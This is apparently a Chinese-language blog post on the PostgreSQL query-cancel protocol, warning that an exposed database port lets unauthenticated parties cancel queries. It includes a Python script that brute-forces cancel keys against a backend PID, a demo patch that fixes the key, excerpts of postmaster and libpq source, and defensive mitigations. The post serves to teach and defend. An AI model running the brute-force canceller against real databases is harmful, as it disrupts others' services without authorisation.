PostgreSQL cancel 通信协议、信号和代码
背景
数据库端口暴露有什么风险么?
你可能会觉得,只要密码足够复杂,或者你设置了pg_hba.conf,数据库端口暴露也没有风险。
可是实际上是这样的吗? 我们的小鲜肉来告诉你风险在哪。
我们来看个例子:
目前这个数据库只允许unix socket连接,但是监听了所有端口。
你觉得这样的pg_hba.conf配置安全么?
postgres@digoal-> psql
psql (9.4.4)
Type "help" for help.
postgres=# \q
postgres@digoal-> psql -h 127.0.0.1
psql: SSL error: sslv3 alert handshake failure
FATAL: no pg_hba.conf entry for host "127.0.0.1", user "postgres", database "postgres", SSL off
我们在这个数据库上运行一个LONG SQL。
postgres=# select pg_backend_pid();
pg_backend_pid
----------------
61758
(1 row)
postgres=# select pg_sleep(10000);
然后编写一个脚本,目的是通过TCP发cancel请求给postmaster,让postmaster去处理cancel请求。
需要告诉postmaster两个值,PID和PID对应的 cancel_key。
[root@digoal ~]# vi cancel.py
#!/usr/bin/python
import struct
import socket
import sys
def pg_cancel_query(pid, cancel_key):
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("127.0.0.1",1921))
buffer = struct.pack('IIII', socket.htonl(16), socket.htonl((1234<<16)|(5678)),\
socket.htonl(int(pid)), socket.htonl(int(cancel_key)))
s.send(buffer)
# log.info("cancel query %s: return %s" % (query, s.recv(1024)))
s.close()
for i in xrange(1,2147483647):
pg_cancel_query(int(sys.argv[1]),i)
执行,
[root@digoal ~]# ./cancel.py 61758
你的这个LONG SQL语句可能会被CANCEL掉。
ERROR: canceling statement due to user request
而在你的日志中可能会有大量的这样的报错
2015-09-29 14:22:41.767 CST,,,61756,"127.0.0.1:28378",560a2e31.cc83,2,"",2015-09-29 14:22:41 CST,,0,LOG,00000,"wrong key in cancel request for process 61758",,,,,,,,"processCancelRequest, postmaster.c:2126",""
也就是说,外界在没有密码的情况下,可以把你的SQL CANCEL掉。只要他尝试正确了你的PID和这个PID对应的cancel_key。
现在知道危险了吧。不要没事把数据库端口暴露出来,破解密码是一种威胁,另一种威胁就是前面举的例子。
分析一下:
PostgreSQL为每个backend pid存储了一个cancel_key,这个KEY是一个随机long值。
src/backend/postmaster/postmaster.c
/*
* List of active backends (or child processes anyway; we don't actually
* know whether a given child has become a backend or is still in the
* authorization phase). This is used mainly to keep track of how many
* children we have and send them appropriate signals when necessary.
*
* "Special" children such as the startup, bgwriter and autovacuum launcher
* tasks are not in this list. Autovacuum worker and walsender are in it.
* Also, "dead_end" children are in it: these are children launched just for
* the purpose of sending a friendly rejection message to a would-be client.
* We must track them because they are attached to shared memory, but we know
* they will never become live backends. dead_end children are not assigned a
* PMChildSlot.
*
* Background workers that request shared memory access during registration are
* in this list, too.
*/
typedef struct bkend
{
pid_t pid; /* process id of backend */
long cancel_key; /* cancel key for cancels for this backend */ 就是他
int child_slot; /* PMChildSlot for this backend, if any */
/*
* Flavor of backend or auxiliary process. Note that BACKEND_TYPE_WALSND
* backends initially announce themselves as BACKEND_TYPE_NORMAL, so if
* bkend_type is normal, you should check for a recent transition.
*/
int bkend_type;
bool dead_end; /* is it going to send an error and quit? */
bool bgworker_notify; /* gets bgworker start/stop notifications */
dlist_node elem; /* list link in BackendList */
} Backend;
处理startup包,如果是cancel包,则交给processCancelRequest处理。
/*
* Read a client's startup packet and do something according to it.
*
* Returns STATUS_OK or STATUS_ERROR, or might call ereport(FATAL) and
* not return at all.
*
* (Note that ereport(FATAL) stuff is sent to the client, so only use it
* if that's what you want. Return STATUS_ERROR if you don't want to
* send anything to the client, which would typically be appropriate
* if we detect a communications failure.)
*/
static int
ProcessStartupPacket(Port *port, bool SSLdone)
{
......
/*
* Allocate at least the size of an old-style startup packet, plus one
* extra byte, and make sure all are zeroes. This ensures we will have
* null termination of all strings, in both fixed- and variable-length
* packet layouts.
*/
if (len <= (int32) sizeof(StartupPacket))
buf = palloc0(sizeof(StartupPacket) + 1);
else
buf = palloc0(len + 1);
......
/*
* The first field is either a protocol version number or a special
* request code.
*/
port->proto = proto = ntohl(*((ProtocolVersion *) buf));
if (proto == CANCEL_REQUEST_CODE)
{
processCancelRequest(port, buf);
/* Not really an error, but we don't want to proceed further */
return STATUS_ERROR;
}
......
postmaster处理cancel请求时,需比对PID和对应的cancel key。
/*
* The client has sent a cancel request packet, not a normal
* start-a-new-connection packet. Perform the necessary processing.
* Nothing is sent back to the client.
*/
static void
processCancelRequest(Port *port, void *pkt)
{
CancelRequestPacket *canc = (CancelRequestPacket *) pkt;
int backendPID;
long cancelAuthCode;
Backend *bp;
#ifndef EXEC_BACKEND
dlist_iter iter;
#else
int i;
#endif
backendPID = (int) ntohl(canc->backendPID);
cancelAuthCode = (long) ntohl(canc->cancelAuthCode);
/*
* See if we have a matching backend. In the EXEC_BACKEND case, we can no
* longer access the postmaster's own backend list, and must rely on the
* duplicate array in shared memory.
*/
#ifndef EXEC_BACKEND
dlist_foreach(iter, &BackendList)
{
bp = dlist_container(Backend, elem, iter.cur);
#else
for (i = MaxLivePostmasterChildren() - 1; i >= 0; i--)
{
bp = (Backend *) &ShmemBackendArray[i];
#endif
if (bp->pid == backendPID) // 比对backend process 的PID
{
if (bp->cancel_key == cancelAuthCode) // 比对backend process 对应的cancel_key
{
/* Found a match; signal that backend to cancel current op */
ereport(DEBUG2,
(errmsg_internal("processing cancel request: sending SIGINT to process %d",
backendPID)));
signal_child(bp->pid, SIGINT); // 发cancel信号
}
else
/* Right PID, wrong key: no way, Jose */
ereport(LOG,
(errmsg("wrong key in cancel request for process %d",
backendPID)));
return;
}
}
/* No matching backend */
ereport(LOG,
(errmsg("PID %d in cancel request did not match any process",
backendPID)));
}
流程:
PostmasterMain
ServerLoop
BackendStartup
fork_process
BackendInitialize
ProcessStartupPacket
processCancelRequest
演示 :
vi src/backend/postmaster/postmaster.c
static int
BackendStartup(Port *port)
{
// MyCancelKey = PostmasterRandom(); // 注释掉随机码,
MyCancelKey = (long) 100; // 使用一个固定值,方便演示
bn->cancel_key = MyCancelKey;
......
make && make install
pg_ctl restart -m fast
[root@digoal ~]# vi cancel.py
#!/usr/bin/python
import struct
import socket
import sys
def pg_cancel_query(pid, cancel_key):
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("127.0.0.1",1921))
buffer = struct.pack('IIII', socket.htonl(16), socket.htonl((1234<<16)|(5678)),\
socket.htonl(int(pid)), socket.htonl(int(cancel_key)))
s.send(buffer)
# log.info("cancel query %s: return %s" % (query, s.recv(1024)))
s.close()
pg_cancel_query(int(sys.argv[1]),100)
现在你可以随意的cancel了。
postgres=# select pg_backend_pid();
pg_backend_pid
----------------
63988
(1 row)
postgres=# select pg_sleep(10000);
[root@digoal ~]# ./cancel.py 63988
ERROR: canceling statement due to user request
风险在哪里
1. cancel 请求。
2. 即使你不知道PID和cancel key也会造成主节点不断的fork process,创建socket。
防范
1. 不要暴露端口,通过防火墙来阻挡。
2. 如果要暴露,请设置白名单。
3. 从源码层加固,但是需要注意psql, 以及其他周边软件可能也是这么来cancel query的。
所以改动可以考虑从pg_hba.conf入手,必须符合pg_hba.conf的规则才允许cancel请求。
如果改动了的话,可能造成不兼容。
如psql
src/bin/psql/common.c
static BOOL WINAPI
consoleHandler(DWORD dwCtrlType)
{
char errbuf[256];
if (dwCtrlType == CTRL_C_EVENT ||
dwCtrlType == CTRL_BREAK_EVENT)
{
/*
* Can't longjmp here, because we are in wrong thread :-(
*/
/* set cancel flag to stop any long-running loops */
cancel_pressed = true;
/* and send QueryCancel if we are processing a database query */
EnterCriticalSection(&cancelConnLock);
if (cancelConn != NULL)
{
if (PQcancel(cancelConn, errbuf, sizeof(errbuf)))
write_stderr("Cancel request sent\n");
else
{
write_stderr("Could not send cancel request: ");
write_stderr(errbuf);
}
}
LeaveCriticalSection(&cancelConnLock);
return TRUE;
}
else
/* Return FALSE for any signals not being handled */
return FALSE;
}
src/interfaces/libpq/fe-connect.c
/*
* PQcancel and PQrequestCancel: attempt to request cancellation of the
* current operation.
*
* The return value is TRUE if the cancel request was successfully
* dispatched, FALSE if not (in which case an error message is available).
* Note: successful dispatch is no guarantee that there will be any effect at
* the backend. The application must read the operation result as usual.
*
* CAUTION: we want this routine to be safely callable from a signal handler
* (for example, an application might want to call it in a SIGINT handler).
* This means we cannot use any C library routine that might be non-reentrant.
* malloc/free are often non-reentrant, and anything that might call them is
* just as dangerous. We avoid sprintf here for that reason. Building up
* error messages with strcpy/strcat is tedious but should be quite safe.
* We also save/restore errno in case the signal handler support doesn't.
*
* internal_cancel() is an internal helper function to make code-sharing
* between the two versions of the cancel function possible.
*/
static int
internal_cancel(SockAddr *raddr, int be_pid, int be_key,
char *errbuf, int errbufsize)
{
int save_errno = SOCK_ERRNO;
pgsocket tmpsock = PGINVALID_SOCKET;
char sebuf[256];
int maxlen;
struct
{
uint32 packetlen;
CancelRequestPacket cp;
} crp;
/*
* We need to open a temporary connection to the postmaster. Do this with
* only kernel calls.
*/
if ((tmpsock = socket(raddr->addr.ss_family, SOCK_STREAM, 0)) == PGINVALID_SOCKET)
{
strlcpy(errbuf, "PQcancel() -- socket() failed: ", errbufsize);
goto cancel_errReturn;
}
retry3:
if (connect(tmpsock, (struct sockaddr *) & raddr->addr,
raddr->salen) < 0)
{
if (SOCK_ERRNO == EINTR)
/* Interrupted system call - we'll just try again */
goto retry3;
strlcpy(errbuf, "PQcancel() -- connect() failed: ", errbufsize);
goto cancel_errReturn;
}
/*
* We needn't set nonblocking I/O or NODELAY options here.
*/
/* Create and send the cancel request packet. */
crp.packetlen = htonl((uint32) sizeof(crp));
crp.cp.cancelRequestCode = (MsgType) htonl(CANCEL_REQUEST_CODE);
crp.cp.backendPID = htonl(be_pid);
crp.cp.cancelAuthCode = htonl(be_key);
retry4:
if (send(tmpsock, (char *) &crp, sizeof(crp), 0) != (int) sizeof(crp))
{
if (SOCK_ERRNO == EINTR)
/* Interrupted system call - we'll just try again */
goto retry4;
strlcpy(errbuf, "PQcancel() -- send() failed: ", errbufsize);
goto cancel_errReturn;
}
/*
* Wait for the postmaster to close the connection, which indicates that
* it's processed the request. Without this delay, we might issue another
* command only to find that our cancel zaps that command instead of the
* one we thought we were canceling. Note we don't actually expect this
* read to obtain any data, we are just waiting for EOF to be signaled.
*/
retry5:
if (recv(tmpsock, (char *) &crp, 1, 0) < 0)
{
if (SOCK_ERRNO == EINTR)
/* Interrupted system call - we'll just try again */
goto retry5;
/* we ignore other error conditions */
}
/* All done */
closesocket(tmpsock);
SOCK_ERRNO_SET(save_errno);
return TRUE;
cancel_errReturn:
/*
* Make sure we don't overflow the error buffer. Leave space for the \n at
* the end, and for the terminating zero.
*/
maxlen = errbufsize - strlen(errbuf) - 2;
if (maxlen >= 0)
{
strncat(errbuf, SOCK_STRERROR(SOCK_ERRNO, sebuf, sizeof(sebuf)),
maxlen);
strcat(errbuf, "\n");
}
if (tmpsock != PGINVALID_SOCKET)
closesocket(tmpsock);
SOCK_ERRNO_SET(save_errno);
return FALSE;
}
判断连接数是否超出,给系统释放sock预留了一些,所以是两倍的(连接数+worker processes+1)。
/*
* MaxLivePostmasterChildren
*
* This reports the number of entries needed in per-child-process arrays
* (the PMChildFlags array, and if EXEC_BACKEND the ShmemBackendArray).
* These arrays include regular backends, autovac workers, walsenders
* and background workers, but not special children nor dead_end children.
* This allows the arrays to have a fixed maximum size, to wit the same
* too-many-children limit enforced by canAcceptConnections(). The exact value
* isn't too critical as long as it's more than MaxBackends.
*/
int
MaxLivePostmasterChildren(void)
{
return 2 * (MaxConnections + autovacuum_max_workers + 1 +
max_worker_processes);
}
是否允许连接
static CAC_state
canAcceptConnections(void)
{
CAC_state result = CAC_OK;
/*
* Can't start backends when in startup/shutdown/inconsistent recovery
* state.
*
* In state PM_WAIT_BACKUP only superusers can connect (this must be
* allowed so that a superuser can end online backup mode); we return
* CAC_WAITBACKUP code to indicate that this must be checked later. Note
* that neither CAC_OK nor CAC_WAITBACKUP can safely be returned until we
* have checked for too many children.
*/
if (pmState != PM_RUN)
{
if (pmState == PM_WAIT_BACKUP)
result = CAC_WAITBACKUP; /* allow superusers only */
else if (Shutdown > NoShutdown)
return CAC_SHUTDOWN; /* shutdown is pending */
else if (!FatalError &&
(pmState == PM_STARTUP ||
pmState == PM_RECOVERY))
return CAC_STARTUP; /* normal startup */
else if (!FatalError &&
pmState == PM_HOT_STANDBY)
result = CAC_OK; /* connection OK during hot standby */
else
return CAC_RECOVERY; /* else must be crash recovery */
}
/*
* Don't start too many children.
*
* We allow more connections than we can have backends here because some
* might still be authenticating; they might fail auth, or some existing
* backend might exit before the auth cycle is completed. The exact
* MaxBackends limit is enforced when a new backend tries to join the
* shared-inval backend array.
*
* The limit here must match the sizes of the per-child-process arrays;
* see comments for MaxLivePostmasterChildren().
*/
if (CountChildren(BACKEND_TYPE_ALL) >= MaxLivePostmasterChildren())
result = CAC_TOOMANY;
return result;
}